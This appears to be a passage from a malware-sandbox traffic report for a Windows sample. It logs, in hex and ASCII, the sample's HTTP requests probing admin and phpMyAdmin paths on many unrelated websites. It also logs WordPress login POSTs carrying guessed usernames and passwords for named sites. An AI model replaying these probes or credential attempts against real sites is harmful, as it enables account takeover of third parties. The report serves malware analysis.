                                                                                                                                                                                                    2023-11-26 06:00:04 UTC16270INData Raw: 33 46 38 36 0d 0a 67 67 6c 65 72 20 64 2d 6e 6f 6e 65 20 6d 69 6e 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 72 65 6d 6f 76 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 35 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65
                                                                                                                                                                                                    Data Ascii: 3F86ggler d-none minus-icon" aria-hidden="true"><span class="material-icons-sharp">remove</span></span><ul><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-5'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamline
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC16320INData Raw: 33 46 42 38 0d 0a 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 66 69 6e 65 73 74 62 65 61 6d 73 2f 73 74 61 66 66 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 53 74 61 66 66 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61
                                                                                                                                                                                                    Data Ascii: 3FB8/www.maxiv.lu.se/beamlines-accelerators/beamlines/finestbeams/staff/" class="menu-item-label">Staff</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-4'><a href="https://www.maxiv.lu.se/beamlines-accelerators/bea


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    597192.168.2.4568823.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC164OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC211INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 61 64 6d 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 39 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 06:00:03 GMTServer: ApacheLocation: https://www.knu.ac.in/adminContent-Length: 295Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC295INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 61 64 6d 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6b 6e 75 2e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.knu.ac.in/admin">here</a>.</p><hr><address>Apache Server at knu.


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    598192.168.2.45691218.228.96.1424436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC241OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: originDirect=true
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC354INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 72 65 63 68 2e 63 6f 6d 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 64 6f 6d 61 69 6e 73 3b 20 70 72 65 6c 6f 61 64 0d 0a 56 61 72 79 3a 20 41 63 63
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 06:00:03 GMTContent-Length: 0Connection: closeContent-Security-Policy: frame-ancestors 'self'Location: https://rech.comStrict-Transport-Security: max-age=315360000; includeSubdomains; preloadVary: Acc


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    599192.168.2.456894117.20.63.1484436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC184OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: student.debritto.sch.id
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 33 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 31 31 37 2e 32 30 2e 36 33 2e 31 34 38 3a 32 30 33 30 2f 70 6d 61 2f 0d 0a 58 2d 43 61 63 68 65 3a 20 48 49 54 20 66 72 6f 6d 20 42 61 63 6b 65 6e 64 0d 0a 53 74 72 69 63 74 2d 54 72 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginx/1.20.1Date: Sun, 26 Nov 2023 06:00:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 238Connection: closeLocation: http://117.20.63.148:2030/pma/X-Cache: HIT from BackendStrict-Tra
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC238INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 31 37 2e 32 30 2e 36 33 2e 31 34 38 3a 32 30 33 30 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://117.20.63.148:2030/pma/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    600192.168.2.45703318.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC173OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC199INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 61 67 72 69 63 6f 6c 61 2e 63 6f 6d 2e 62 72 2f 70 6d 61 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 06:00:03 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rechagricola.com.br/pma/
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    601192.168.2.457066185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC169OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                    Host: grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC331INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 61 64 6d 69 6e 2f 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 06:00:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 318Connection: closeLocation: http://www.grantstech.io/admin/Cache-Control: max-age=0Expires: Sun, 26 Nov 2023 06:00:
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC318INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.grantstech.io/admin/">here</a>.</p><hr><address>Apache/2.4.56 (De


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    602192.168.2.457077213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC395OUTPOST /wp/wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_test_cookie=WP+Cookie+check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.ceuandalucia.es/wp/wp-login.php
                                                                                                                                                                                                    Content-Length: 143
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC143OUTData Raw: 6c 6f 67 3d 63 65 75 61 6e 64 61 6c 75 63 69 61 26 70 77 64 3d 68 6f 6c 61 61 61 61 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 41 63 63 65 64 65 72 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 25 32 46 77 70 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=ceuandalucia&pwd=holaaaa&rememberme=forever&wp-submit=Acceder&redirect_to=https%3A%2F%2Fwww.ceuandalucia.es%2Fwp%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC542INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:03 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC7437INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="es" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://w


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    603192.168.2.457117144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC356OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://gruporegiosafety.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 139
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 06:00:03 UTC139OUTData Raw: 6c 6f 67 3d 61 64 6d 69 6e 26 70 77 64 3d 43 6f 6d 70 72 61 73 47 52 53 32 30 32 33 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 41 63 63 65 64 65 72 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 67 72 75 70 6f 72 65 67 69 6f 73 61 66 65 74 79 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=admin&pwd=ComprasGRS2023&rememberme=forever&wp-submit=Acceder&redirect_to=https%3A%2F%2Fgruporegiosafety.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC496INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 06:00:03 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/;
                                                                                                                                                                                                    2023-11-26 06:00:04 UTC7696INData Raw: 32 38 63 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 41 63 63 65 64 65 72 20 26 6c 73 61 71 75 6f 3b 20 47 52 55 50 4f 20 52 45 47 49 4f 20 53 41 46 45 54 59 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 61 63 74 69 6f 6e 2d 6c 6f 73 74 70 61 73 73 77 6f 72 64 20 23 6c 6f 67 69 6e 5f 65 72 72 6f 72 7b 0a 20 20
                                                                                                                                                                                                    Data Ascii: 28cd<!DOCTYPE html><html lang="es-MX"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Acceder &lsaquo; GRUPO REGIO SAFETY &#8212; WordPress</title> <style> .login-action-lostpassword #login_error{
